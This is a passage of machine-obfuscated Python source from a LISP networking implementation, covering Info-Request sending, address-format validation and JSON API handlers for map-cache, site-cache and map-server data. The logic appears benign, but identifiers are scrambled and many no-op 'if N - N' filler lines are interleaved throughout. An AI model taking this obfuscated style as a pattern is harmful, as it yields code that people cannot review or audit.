for OoOoO in list ( lisp_map_servers_list . values ( ) ) :
OoI1i1 . append ( OoOoO . map_server )
if 97 - 97: I1IiiI
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
if ( OoI1i1 == [ ] ) : return
else :
OoI1i1 . append ( dest )
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
if 94 - 94: I11i . i1IIi / II111iiii + OOooOOo
if 64 - 64: I1IiiI % ooOoO0o
if 72 - 72: O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
OOO0O0Oo0O0 = { }
for II1II1Iii1I in lisp_db_list :
for iII in II1II1Iii1I . rloc_set :
lisp_update_local_rloc ( iII )
if ( iII . rloc . is_null ( ) ) : continue
if ( iII . interface == None ) : continue
if 80 - 80: OOooOOo * I11i / OOooOOo - oO0o
oOOOo0o = iII . rloc . print_address_no_iid ( )
if ( oOOOo0o in OOO0O0Oo0O0 ) : continue
OOO0O0Oo0O0 [ oOOOo0o ] = iII . interface
if 18 - 18: i1IIi - OOooOOo - o0oOOo0O0Ooo - iIii1I11I1II1
if 72 - 72: OoooooooOO % I1IiiI . OoO0O00
if ( OOO0O0Oo0O0 == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 28 - 28: II111iiii / iIii1I11I1II1 / iII111i - o0oOOo0O0Ooo . I1IiiI / O0
return
if 16 - 16: ooOoO0o * oO0o . OoooooooOO
if 44 - 44: iIii1I11I1II1 * OOooOOo + OoO0O00 - OoooooooOO
if 13 - 13: Oo0Ooo . I11i . II111iiii
if 6 - 6: OOooOOo . IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
if 85 - 85: i11iIiiIii + OoOoOO00
if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
for oOOOo0o in OOO0O0Oo0O0 :
i1i1111I = OOO0O0Oo0O0 [ oOOOo0o ]
OoOOOO = red ( oOOOo0o , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( OoOOOO ,
i1i1111I ) )
OoO0 = i1i1111I if len ( OOO0O0Oo0O0 ) > 1 else None
for dest in OoI1i1 :
lisp_send_info_request ( lisp_sockets , dest , port , OoO0 )
if 60 - 60: OOooOOo . Ii1I
if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
if 38 - 38: IiII / I11i / IiII * iII111i
if 30 - 30: oO0o
if 30 - 30: IiII / OoO0O00
if ( oO0O != [ ] ) :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
iii1i . resolve_dns_name ( )
if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
return
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
if 54 - 54: OoOoOO00 / i1IIi + OOooOOo - I1ii11iIi11i - I1IiiI * I1Ii111
if 91 - 91: OoooooooOO * OoooooooOO
if 27 - 27: ooOoO0o / I1IiiI * I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
if 33 - 33: OOooOOo % OoooooooOO
if 98 - 98: Ii1I
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
if 95 - 95: iIii1I11I1II1 / O0 % O0
if 53 - 53: ooOoO0o . ooOoO0o
if 80 - 80: i11iIiiIii % I1Ii111 % I1IiiI / I1IiiI + oO0o + iII111i
if 18 - 18: OoO0O00 * ooOoO0o
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if 67 - 67: I1IiiI
if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
if ( value . find ( "." ) != - 1 ) :
oOOOo0o = value . split ( "." )
if ( len ( oOOOo0o ) != 4 ) : return ( False )
if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
for i1ioooo0OooO in oOOOo0o :
if ( i1ioooo0OooO . isdigit ( ) == False ) : return ( False )
if ( int ( i1ioooo0OooO ) > 255 ) : return ( False )
if 68 - 68: OoOoOO00 + I1ii11iIi11i % i11iIiiIii
return ( True )
if 58 - 58: OoO0O00 / Oo0Ooo + Ii1I
if 63 - 63: OOooOOo / I1ii11iIi11i
if 86 - 86: O0 + iII111i + OoooooooOO / iII111i * I1ii11iIi11i * OoooooooOO
if 89 - 89: oO0o - OOooOOo / iII111i - I1IiiI
if 78 - 78: iIii1I11I1II1 + O0 + IiII . I11i / i11iIiiIii . O0
if ( value . find ( "-" ) != - 1 ) :
oOOOo0o = value . split ( "-" )
for OoOOoO0oOo in [ "N" , "S" , "W" , "E" ] :
if ( OoOOoO0oOo in oOOOo0o ) :
if ( len ( oOOOo0o ) < 8 ) : return ( False )
return ( True )
if 21 - 21: OoOoOO00 * OOooOOo + oO0o + O0
if 59 - 59: i1IIi / OoooooooOO . OoO0O00 / OOooOOo % o0oOOo0O0Ooo - i11iIiiIii
if 58 - 58: IiII . Ii1I + II111iiii
if 31 - 31: i11iIiiIii + i11iIiiIii + I11i * Oo0Ooo . I11i
if 28 - 28: OOooOOo * iIii1I11I1II1 * OoOoOO00
if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
if ( value . find ( "-" ) != - 1 ) :
oOOOo0o = value . split ( "-" )
if ( len ( oOOOo0o ) != 3 ) : return ( False )
if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
for IIII111i in oOOOo0o :
try : int ( IIII111i , 16 )
except : return ( False )
if 42 - 42: I1Ii111 . OoO0O00 + I11i / ooOoO0o / i11iIiiIii / iII111i
return ( True )
if 46 - 46: OoooooooOO . II111iiii
if 67 - 67: o0oOOo0O0Ooo * ooOoO0o / II111iiii - o0oOOo0O0Ooo % iIii1I11I1II1
if 55 - 55: ooOoO0o
if 88 - 88: ooOoO0o / ooOoO0o . I11i
if 2 - 2: OoO0O00 * OoO0O00 * Ii1I + iII111i + OOooOOo - II111iiii
if ( value . find ( ":" ) != - 1 ) :
oOOOo0o = value . split ( ":" )
if ( len ( oOOOo0o ) < 2 ) : return ( False )
if 76 - 76: II111iiii * o0oOOo0O0Ooo - IiII
Oo00O0oooO0 = False
IiI = 0
for IIII111i in oOOOo0o :
IiI += 1
if ( IIII111i == "" ) :
if ( Oo00O0oooO0 ) :
if ( len ( oOOOo0o ) == IiI ) : break
if ( IiI > 2 ) : return ( False )
if 7 - 7: ooOoO0o
Oo00O0oooO0 = True
continue
if 11 - 11: iII111i . oO0o % I11i
try : int ( IIII111i , 16 )
except : return ( False )
if 42 - 42: I1ii11iIi11i
return ( True )
if 77 - 77: iIii1I11I1II1 * i11iIiiIii + Ii1I . ooOoO0o / OOooOOo * O0
if 44 - 44: Oo0Ooo * o0oOOo0O0Ooo - I11i
if 56 - 56: Ii1I * OoO0O00 % ooOoO0o . I11i % I1Ii111
if 78 - 78: i1IIi * OOooOOo . I1ii11iIi11i . iIii1I11I1II1 + i1IIi % Ii1I
if 31 - 31: iII111i + Oo0Ooo / I1ii11iIi11i / I1IiiI * OoooooooOO . I1ii11iIi11i
if ( value [ 0 ] == "+" ) :
oOOOo0o = value [ 1 : : ]
for Ooi1i1iIIi1IIi1 in oOOOo0o :
if ( Ooi1i1iIIi1IIi1 . isdigit ( ) == False ) : return ( False )
if 61 - 61: OOooOOo . iII111i * I1Ii111
return ( True )
if 94 - 94: I1ii11iIi11i % II111iiii . O0
return ( False )
if 38 - 38: o0oOOo0O0Ooo % i11iIiiIii / I1Ii111 / I1ii11iIi11i % iII111i - oO0o
if 76 - 76: iIii1I11I1II1 / I1ii11iIi11i + i1IIi % oO0o / iIii1I11I1II1
if 33 - 33: OoooooooOO * i1IIi / O0 * I1ii11iIi11i
if 55 - 55: o0oOOo0O0Ooo * Oo0Ooo . ooOoO0o
if 25 - 25: IiII . O0 / OoOoOO00
if 33 - 33: OoO0O00
if 55 - 55: ooOoO0o + ooOoO0o
if 93 - 93: oO0o - I1IiiI / I1ii11iIi11i % o0oOOo0O0Ooo / OoooooooOO + II111iiii
if 10 - 10: o0oOOo0O0Ooo - iII111i . O0 + OoO0O00 - Oo0Ooo - i11iIiiIii
if 37 - 37: iIii1I11I1II1
if 37 - 37: II111iiii % OoOoOO00 . IiII * ooOoO0o . I1IiiI
if 25 - 25: OoooooooOO % i1IIi . I1Ii111 / OoOoOO00 - I1ii11iIi11i
if 15 - 15: iIii1I11I1II1
if 72 - 72: OoO0O00 . IiII * Ii1I - I1IiiI
def lisp_process_api ( process , lisp_socket , data_structure ) :
OOOoO00000oOoO , I1iI1i11IiI11 = data_structure . split ( "%" )
if 84 - 84: OoO0O00 + Oo0Ooo . I1IiiI
lprint ( "Process API request '{}', parameters: '{}'" . format ( OOOoO00000oOoO ,
I1iI1i11IiI11 ) )
if 65 - 65: OoO0O00
oO00Oo0OO = [ ]
if ( OOOoO00000oOoO == "map-cache" ) :
if ( I1iI1i11IiI11 == "" ) :
oO00Oo0OO = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , oO00Oo0OO )
else :
oO00Oo0OO = lisp_process_api_map_cache_entry ( json . loads ( I1iI1i11IiI11 ) )
if 34 - 34: IiII * IiII
if 76 - 76: OOooOOo
if ( OOOoO00000oOoO == "site-cache" ) :
if ( I1iI1i11IiI11 == "" ) :
oO00Oo0OO = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
oO00Oo0OO )
else :
oO00Oo0OO = lisp_process_api_site_cache_entry ( json . loads ( I1iI1i11IiI11 ) )
if 54 - 54: O0 * II111iiii * OOooOOo
if 44 - 44: I1IiiI
if ( OOOoO00000oOoO == "site-cache-summary" ) :
oO00Oo0OO = lisp_process_api_site_cache_summary ( lisp_sites_by_eid )
if 66 - 66: o0oOOo0O0Ooo
if ( OOOoO00000oOoO == "map-server" ) :
I1iI1i11IiI11 = { } if ( I1iI1i11IiI11 == "" ) else json . loads ( I1iI1i11IiI11 )
oO00Oo0OO = lisp_process_api_ms_or_mr ( True , I1iI1i11IiI11 )
if 40 - 40: OOooOOo * Ii1I
if ( OOOoO00000oOoO == "map-resolver" ) :
I1iI1i11IiI11 = { } if ( I1iI1i11IiI11 == "" ) else json . loads ( I1iI1i11IiI11 )
oO00Oo0OO = lisp_process_api_ms_or_mr ( False , I1iI1i11IiI11 )
if 38 - 38: ooOoO0o
if ( OOOoO00000oOoO == "database-mapping" ) :
oO00Oo0OO = lisp_process_api_database_mapping ( )
if 5 - 5: OoooooooOO + iII111i - I11i
if 95 - 95: OOooOOo / i11iIiiIii - Ii1I + I1ii11iIi11i
if 7 - 7: I1ii11iIi11i
if 37 - 37: O0 . II111iiii
if 70 - 70: o0oOOo0O0Ooo / iII111i + i1IIi + I11i % iIii1I11I1II1 % Oo0Ooo
oO00Oo0OO = json . dumps ( oO00Oo0OO )
ii1I11Iii = lisp_api_ipc ( process , oO00Oo0OO )
lisp_ipc ( ii1I11Iii , lisp_socket , "lisp-core" )
return
if 1 - 1: O0 + OoO0O00 . i11iIiiIii + I1Ii111 - OoO0O00 - IiII
if 1 - 1: I1ii11iIi11i / i1IIi . I1IiiI / Ii1I
if 19 - 19: iIii1I11I1II1 / Oo0Ooo . O0 - Oo0Ooo
if 74 - 74: I1ii11iIi11i * OoooooooOO . iII111i
if 45 - 45: I1IiiI - IiII % ooOoO0o - IiII . Oo0Ooo - o0oOOo0O0Ooo
if 27 - 27: iII111i
if 64 - 64: iIii1I11I1II1 - OOooOOo . iII111i % o0oOOo0O0Ooo / II111iiii % OoooooooOO
def lisp_process_api_map_cache ( mc , data ) :
if 87 - 87: OoooooooOO
if 70 - 70: o0oOOo0O0Ooo % OoooooooOO % I1IiiI . OoOoOO00 * I1IiiI - ooOoO0o
if 92 - 92: I1IiiI . I11i
if 66 - 66: I1Ii111 / I11i / OoooooooOO % OoOoOO00 . oO0o * iII111i
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 34 - 34: I1ii11iIi11i * I1ii11iIi11i % I11i / OOooOOo % oO0o . OoOoOO00
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 25 - 25: I1ii11iIi11i / I11i + i1IIi . I1IiiI + ooOoO0o
if 29 - 29: IiII + I1ii11iIi11i
if 8 - 8: IiII % I1IiiI
if 10 - 10: OoooooooOO / OoOoOO00
if 77 - 77: OoOoOO00
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 10 - 10: IiII / i11iIiiIii
if 19 - 19: OoO0O00
if 100 - 100: I1ii11iIi11i - I1ii11iIi11i
if 38 - 38: I1Ii111
if 23 - 23: Ii1I . I1ii11iIi11i + I1Ii111 + i1IIi * o0oOOo0O0Ooo - i11iIiiIii
if 92 - 92: I1Ii111 - I1IiiI + Ii1I / iII111i % OOooOOo
if 32 - 32: i1IIi . iII111i - Ii1I % iII111i % II111iiii - oO0o
def lisp_gather_map_cache_data ( mc , data ) :
iIiiI11II11i = { }
iIiiI11II11i [ "instance-id" ] = str ( mc . eid . instance_id )
iIiiI11II11i [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
iIiiI11II11i [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 36 - 36: OoooooooOO * OoooooooOO . ooOoO0o . O0
iIiiI11II11i [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
iIiiI11II11i [ "expires" ] = lisp_print_elapsed ( mc . uptime )
iIiiI11II11i [ "action" ] = lisp_map_reply_action_string [ mc . action ]
iIiiI11II11i [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 5 - 5: I11i % I1IiiI - OoO0O00 . Oo0Ooo
if 79 - 79: iII111i + IiII % I11i . Oo0Ooo / IiII * iII111i
if 40 - 40: iII111i - I1IiiI + OoOoOO00
if 2 - 2: I11i - II111iiii / I1Ii111
if 27 - 27: OoO0O00 - I1ii11iIi11i * i11iIiiIii + Oo0Ooo
IiIiIiiII1I = [ ]
for OooOOoOO0OO in mc . rloc_set :
I1I1iIiiiiII11 = lisp_fill_rloc_in_json ( OooOOoOO0OO )
if 29 - 29: I1ii11iIi11i / IiII . I1Ii111 + Ii1I + OoO0O00
if 76 - 76: ooOoO0o . I11i * OoO0O00
if 53 - 53: II111iiii / OoOoOO00 / IiII * oO0o
if 52 - 52: O0 % iII111i * iIii1I11I1II1 / I11i / I1IiiI * ooOoO0o
if 93 - 93: iIii1I11I1II1 . II111iiii * OOooOOo - iIii1I11I1II1 . oO0o % Oo0Ooo
if ( OooOOoOO0OO . rloc . is_multicast_address ( ) ) :
I1I1iIiiiiII11 [ "multicast-rloc-set" ] = [ ]
for O0o00O00oo0oO in list ( OooOOoOO0OO . multicast_rloc_probe_list . values ( ) ) :
iii1i = lisp_fill_rloc_in_json ( O0o00O00oo0oO )
I1I1iIiiiiII11 [ "multicast-rloc-set" ] . append ( iii1i )
if 92 - 92: OoO0O00
if 42 - 42: I1ii11iIi11i - iIii1I11I1II1 % ooOoO0o
if 7 - 7: Oo0Ooo / ooOoO0o + o0oOOo0O0Ooo
IiIiIiiII1I . append ( I1I1iIiiiiII11 )
if 38 - 38: o0oOOo0O0Ooo . O0 - OoO0O00 % I11i
iIiiI11II11i [ "rloc-set" ] = IiIiIiiII1I
if 80 - 80: o0oOOo0O0Ooo
data . append ( iIiiI11II11i )
return ( [ True , data ] )
if 100 - 100: iIii1I11I1II1 . OoOoOO00 . OoooooooOO / I1ii11iIi11i - I1IiiI * I11i
if 5 - 5: i1IIi * o0oOOo0O0Ooo - I1Ii111 + I1IiiI - II111iiii
if 15 - 15: I1Ii111
if 38 - 38: O0
if 50 - 50: i11iIiiIii * OoO0O00 + iII111i / O0 * oO0o % ooOoO0o
if 6 - 6: OoO0O00 . o0oOOo0O0Ooo / Ii1I + Ii1I
if 59 - 59: II111iiii - o0oOOo0O0Ooo * OoooooooOO
if 83 - 83: oO0o . iIii1I11I1II1 . iII111i % Oo0Ooo
def lisp_fill_rloc_in_json ( rloc ) :
I1I1iIiiiiII11 = { }
if ( rloc . rloc_exists ( ) ) :
I1I1iIiiiiII11 [ "address" ] = rloc . rloc . print_address_no_iid ( )
if 48 - 48: oO0o % OoO0O00 - OoooooooOO . IiII
if 11 - 11: I1Ii111 % o0oOOo0O0Ooo - o0oOOo0O0Ooo % OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i
if ( rloc . translated_port != 0 ) :
I1I1iIiiiiII11 [ "encap-port" ] = str ( rloc . translated_port )
if 33 - 33: OoO0O00 + II111iiii . Oo0Ooo * I1Ii111
I1I1iIiiiiII11 [ "state" ] = rloc . print_state ( )
if ( rloc . geo ) : I1I1iIiiiiII11 [ "geo" ] = rloc . geo . print_geo ( )
if ( rloc . elp ) : I1I1iIiiiiII11 [ "elp" ] = rloc . elp . print_elp ( False )
if ( rloc . rle ) : I1I1iIiiiiII11 [ "rle" ] = rloc . rle . print_rle ( False , False )
if ( rloc . json ) : I1I1iIiiiiII11 [ "json" ] = rloc . json . print_json ( False )
if ( rloc . rloc_name ) : I1I1iIiiiiII11 [ "rloc-name" ] = rloc . rloc_name
Ooo0oOo = rloc . stats . get_stats ( False , False )
if ( Ooo0oOo ) : I1I1iIiiiiII11 [ "stats" ] = Ooo0oOo
I1I1iIiiiiII11 [ "uptime" ] = lisp_print_elapsed ( rloc . uptime )
I1I1iIiiiiII11 [ "upriority" ] = str ( rloc . priority )
I1I1iIiiiiII11 [ "uweight" ] = str ( rloc . weight )
I1I1iIiiiiII11 [ "mpriority" ] = str ( rloc . mpriority )
I1I1iIiiiiII11 [ "mweight" ] = str ( rloc . mweight )
ooOOoOO = rloc . last_rloc_probe_reply
if ( ooOOoOO ) :
I1I1iIiiiiII11 [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( ooOOoOO )
I1I1iIiiiiII11 [ "rloc-probe-rtt" ] = str ( rloc . rloc_probe_rtt )
if 36 - 36: I1IiiI % O0 + OoO0O00
I1I1iIiiiiII11 [ "rloc-hop-count" ] = rloc . rloc_probe_hops
I1I1iIiiiiII11 [ "recent-rloc-hop-counts" ] = rloc . recent_rloc_probe_hops
if 37 - 37: II111iiii / I1ii11iIi11i * I1IiiI - OoooooooOO
I1I1iIiiiiII11 [ "rloc-probe-latency" ] = rloc . rloc_probe_latency
I1I1iIiiiiII11 [ "recent-rloc-probe-latencies" ] = rloc . recent_rloc_probe_latencies
if 55 - 55: IiII / ooOoO0o * I1IiiI / I1Ii111 - Oo0Ooo % o0oOOo0O0Ooo
OOoooOo0 = [ ]
for i1o0 in rloc . recent_rloc_probe_rtts : OOoooOo0 . append ( str ( i1o0 ) )
I1I1iIiiiiII11 [ "recent-rloc-probe-rtts" ] = OOoooOo0
return ( I1I1iIiiiiII11 )
if 43 - 43: OoO0O00 / IiII % iIii1I11I1II1
if 89 - 89: I11i + iII111i / i11iIiiIii
if 46 - 46: ooOoO0o + ooOoO0o / IiII
if 57 - 57: OOooOOo + I1ii11iIi11i
if 82 - 82: i11iIiiIii
if 31 - 31: iII111i
if 64 - 64: Ii1I
def lisp_process_api_map_cache_entry ( parms ) :
i1oO00O = parms [ "instance-id" ]
i1oO00O = 0 if ( i1oO00O == "" ) else int ( i1oO00O )
if 4 - 4: OoOoOO00
if 78 - 78: i1IIi - iII111i + O0 - I1IiiI % o0oOOo0O0Ooo
if 48 - 48: iII111i / II111iiii * I1Ii111 + I11i / ooOoO0o . OoOoOO00
if 45 - 45: OOooOOo / Ii1I % O0
I11I = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
I11I . store_prefix ( parms [ "eid-prefix" ] )
OooOOooo = I11I
OO = I11I
if 7 - 7: oO0o * i11iIiiIii + OoooooooOO + I11i
if 9 - 9: II111iiii * Oo0Ooo * I1Ii111 . IiII
if 80 - 80: i11iIiiIii . i11iIiiIii . i11iIiiIii . OoooooooOO - OOooOOo * OoooooooOO
if 96 - 96: oO0o
if 80 - 80: IiII - oO0o % Ii1I - iIii1I11I1II1 . OoO0O00
o0o0o = lisp_address ( LISP_AFI_NONE , "" , 0 , i1oO00O )
if ( "group-prefix" in parms ) :
o0o0o . store_prefix ( parms [ "group-prefix" ] )
OooOOooo = o0o0o
if 64 - 64: I1IiiI % i11iIiiIii / oO0o
if 78 - 78: II111iiii - Oo0Ooo . iIii1I11I1II1 - ooOoO0o . oO0o
oO00Oo0OO = [ ]
I11 = lisp_map_cache_lookup ( OO , OooOOooo )
if ( I11 ) : o0o0O0O0Oooo0 , oO00Oo0OO = lisp_process_api_map_cache ( I11 , oO00Oo0OO )
return ( oO00Oo0OO )
if 84 - 84: iII111i . ooOoO0o * I1IiiI * Oo0Ooo / I1Ii111
if 93 - 93: i1IIi * i11iIiiIii % OoOoOO00 % iII111i
if 31 - 31: OoO0O00
if 89 - 89: II111iiii
if 33 - 33: OOooOOo / oO0o % OoOoOO00 * O0
if 65 - 65: OoO0O00 % OoOoOO00 % I1ii11iIi11i / OoooooooOO
if 85 - 85: O0 * OOooOOo % I1Ii111
if 33 - 33: O0
if 30 - 30: II111iiii . O0 . oO0o * I1ii11iIi11i + oO0o . o0oOOo0O0Ooo
if 43 - 43: iIii1I11I1II1
if 88 - 88: I1IiiI - OoO0O00 . O0 . oO0o
def lisp_process_api_site_cache_summary ( site_cache ) :
iI1I1ii = { "site" : "" , "registrations" : [ ] }
iIiiI11II11i = { "eid-prefix" : "" , "count" : 0 , "registered-count" : 0 }
if 75 - 75: II111iiii % OOooOOo / iIii1I11I1II1 / OoO0O00 + oO0o
III1Ii = { }
for O00o00 in site_cache . cache_sorted :
for Ii111i1 in list ( site_cache . cache [ O00o00 ] . entries . values ( ) ) :
if ( Ii111i1 . accept_more_specifics == False ) : continue
if ( Ii111i1 . site . site_name not in III1Ii ) :
III1Ii [ Ii111i1 . site . site_name ] = [ ]
if 28 - 28: I1ii11iIi11i . oO0o / o0oOOo0O0Ooo - iII111i
I1i = copy . deepcopy ( iIiiI11II11i )
I1i [ "eid-prefix" ] = Ii111i1 . eid . print_prefix ( )
I1i [ "count" ] = len ( Ii111i1 . more_specific_registrations )
for OO00O0OO00o0 in Ii111i1 . more_specific_registrations :
if ( OO00O0OO00o0 . registered ) : I1i [ "registered-count" ] += 1
if 12 - 12: OoooooooOO - I1ii11iIi11i * iII111i / ooOoO0o
III1Ii [ Ii111i1 . site . site_name ] . append ( I1i )
if 99 - 99: I1ii11iIi11i + I11i
if 29 - 29: I1ii11iIi11i / oO0o
if 2 - 2: Oo0Ooo / IiII - OoooooooOO
oO00Oo0OO = [ ]
for IIiii in III1Ii :
I1iiIi111I = copy . deepcopy ( iI1I1ii )
I1iiIi111I [ "site" ] = IIiii
I1iiIi111I [ "registrations" ] = III1Ii [ IIiii ]
oO00Oo0OO . append ( I1iiIi111I )
if 65 - 65: OoO0O00 - Ii1I
return ( oO00Oo0OO )
if 98 - 98: OoOoOO00 * I1Ii111 * iIii1I11I1II1 * OoOoOO00
if 15 - 15: Oo0Ooo
if 100 - 100: IiII + I1ii11iIi11i + iII111i . i1IIi . I1ii11iIi11i / OoooooooOO
if 84 - 84: o0oOOo0O0Ooo * I11i
if 22 - 22: i1IIi + OOooOOo % OoooooooOO
if 34 - 34: oO0o / O0 - II111iiii % Oo0Ooo + I11i
if 23 - 23: o0oOOo0O0Ooo + i11iIiiIii . I1IiiI + iIii1I11I1II1
def lisp_process_api_site_cache ( se , data ) :
if 18 - 18: o0oOOo0O0Ooo . O0 + I1Ii111
if 66 - 66: OoooooooOO
if 90 - 90: IiII - OoOoOO00
if 98 - 98: Oo0Ooo / oO0o . Ii1I
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 56 - 56: ooOoO0o % OoO0O00 * i11iIiiIii % IiII % I1IiiI - oO0o
if ( se . source_cache == None ) : return ( [ True , data ] )
if 37 - 37: iII111i - Ii1I . oO0o
if 47 - 47: IiII / I1ii11iIi11i . o0oOOo0O0Ooo . ooOoO0o + OOooOOo . OOooOOo
if 25 - 25: oO0o
if 43 - 43: Ii1I - o0oOOo0O0Ooo % oO0o - O0
if 20 - 20: OoO0O00 . ooOoO0o / OoOoOO00 - OoOoOO00 . iII111i / OOooOOo
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 39 - 39: iIii1I11I1II1 % ooOoO0o
if 75 - 75: i1IIi * II111iiii * O0 * i11iIiiIii % iII111i / iII111i
if 36 - 36: IiII / I1IiiI % iII111i / iII111i
if 38 - 38: OOooOOo * I1ii11iIi11i * I1Ii111 + I11i
if 65 - 65: O0 + O0 * I1Ii111
if 66 - 66: OOooOOo / O0 + i1IIi . O0 % I1ii11iIi11i - OoooooooOO
if 16 - 16: I11i % iII111i
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
Ii1IiIIIi = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOOo0oOO = data [ "dns-name" ] if ( "dns-name" in data ) else None
if ( "address" in data ) :
Ii1IiIIIi . store_address ( data [ "address" ] )
if 29 - 29: I1IiiI - ooOoO0o * OoO0O00 . i11iIiiIii % OoOoOO00 * o0oOOo0O0Ooo
if 43 - 43: OoO0O00 * OOooOOo / I1Ii111 % OoOoOO00 . oO0o / OOooOOo
iiIiII11i1 = { }
if ( ms_or_mr ) :
for OoOoO in list ( lisp_map_servers_list . values ( ) ) :
if ( OOOo0oOO ) :
if ( OOOo0oOO != OoOoO . dns_name ) : continue
else :
if ( Ii1IiIIIi . is_exact_match ( OoOoO . map_server ) == False ) : continue
if 62 - 62: O0 * I1ii11iIi11i - O0 / I11i % ooOoO0o
if 1 - 1: O0 / iIii1I11I1II1
iiIiII11i1 [ "dns-name" ] = OoOoO . dns_name
iiIiII11i1 [ "address" ] = OoOoO . map_server . print_address_no_iid ( )
iiIiII11i1 [ "ms-name" ] = "" if OoOoO . ms_name == None else OoOoO . ms_name
return ( [ iiIiII11i1 ] )
if 17 - 17: OoOoOO00 + ooOoO0o * II111iiii * OoOoOO00 + I1IiiI + i11iIiiIii
else :
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( OOOo0oOO ) :
if ( OOOo0oOO != iii1i . dns_name ) : continue
else :
if ( Ii1IiIIIi . is_exact_match ( iii1i . map_resolver ) == False ) : continue
if 46 - 46: i1IIi - II111iiii . I1IiiI . i11iIiiIii
if 54 - 54: O0 * I1ii11iIi11i / OOooOOo / IiII * IiII
iiIiII11i1 [ "dns-name" ] = iii1i . dns_name
iiIiII11i1 [ "address" ] = iii1i . map_resolver . print_address_no_iid ( )
iiIiII11i1 [ "mr-name" ] = "" if iii1i . mr_name == None else iii1i . mr_name
return ( [ iiIiII11i1 ] )
if 69 - 69: Oo0Ooo * OoooooooOO / I1IiiI
if 16 - 16: o0oOOo0O0Ooo
return ( [ ] )
if 3 - 3: i11iIiiIii . I1ii11iIi11i
if 65 - 65: II111iiii * iII111i - OoO0O00 + oO0o % OoO0O00
if 83 - 83: OoooooooOO % I1ii11iIi11i . IiII + OOooOOo . iII111i - ooOoO0o
if 100 - 100: o0oOOo0O0Ooo
if 95 - 95: iII111i * oO0o * i1IIi
if 100 - 100: iII111i . o0oOOo0O0Ooo - I1Ii111 % oO0o
if 11 - 11: o0oOOo0O0Ooo . OoooooooOO - i1IIi
if 71 - 71: I1IiiI . OOooOOo . I1ii11iIi11i
def lisp_process_api_database_mapping ( ) :
oO00Oo0OO = [ ]
if 90 - 90: i11iIiiIii + I1Ii111 % II111iiii
for II1II1Iii1I in lisp_db_list :
iIiiI11II11i = { }
iIiiI11II11i [ "eid-prefix" ] = II1II1Iii1I . eid . print_prefix ( )
if ( II1II1Iii1I . group . is_null ( ) == False ) :
iIiiI11II11i [ "group-prefix" ] = II1II1Iii1I . group . print_prefix ( )
if 67 - 67: OoOoOO00 / iII111i * OoO0O00 % i11iIiiIii
if 76 - 76: OoO0O00
o0O = [ ]
for I1I1iIiiiiII11 in II1II1Iii1I . rloc_set :
OooOOoOO0OO = { }
if ( I1I1iIiiiiII11 . rloc . is_null ( ) == False ) :
OooOOoOO0OO [ "rloc" ] = I1I1iIiiiiII11 . rloc . print_address_no_iid ( )
if 92 - 92: iIii1I11I1II1 * O0 % I11i
if ( I1I1iIiiiiII11 . rloc_name != None ) : OooOOoOO0OO [ "rloc-name" ] = I1I1iIiiiiII11 . rloc_name
if ( I1I1iIiiiiII11 . interface != None ) : OooOOoOO0OO [ "interface" ] = I1I1iIiiiiII11 . interface
oOO000 = I1I1iIiiiiII11 . translated_rloc
if ( oOO000 . is_null ( ) == False ) :
OooOOoOO0OO [ "translated-rloc" ] = oOO000 . print_address_no_iid ( )
if 88 - 88: iIii1I11I1II1 * iIii1I11I1II1
if ( OooOOoOO0OO != { } ) : o0O . append ( OooOOoOO0OO )
if 2 - 2: Oo0Ooo + II111iiii * O0 / iIii1I11I1II1 / iIii1I11I1II1
